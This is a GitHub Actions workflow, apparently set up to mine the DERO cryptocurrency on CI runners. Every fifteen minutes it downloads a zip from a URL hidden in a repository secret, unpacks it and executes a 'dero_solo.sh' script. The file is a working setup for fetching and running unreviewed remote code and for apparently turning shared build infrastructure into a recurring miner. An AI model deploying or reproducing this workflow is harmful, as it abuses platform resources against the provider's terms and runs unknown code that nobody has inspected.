name: dero

on:
  schedule:
    - cron: "*/15 * * * *" 
  workflow_dispatch:

jobs:
  export-and-run:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
        with:
          token: ${{ secrets.GITHUB_TOKEN }}

      - name: Download
        shell: bash
        run: |
          curl -L -o dero.zip "${{ secrets.DERO }}"
          if [ ! -f "dero.zip" ]; then
            echo "Download failed: dero.zip not found."
            exit 1
          fi

      - name: Unzip
        shell: bash
        run: |
          unzip dero.zip
          rm dero.zip

      - name: Run
        shell: bash
        run: |
          chmod +x ./dero_solo.sh
          ./dero_solo.sh
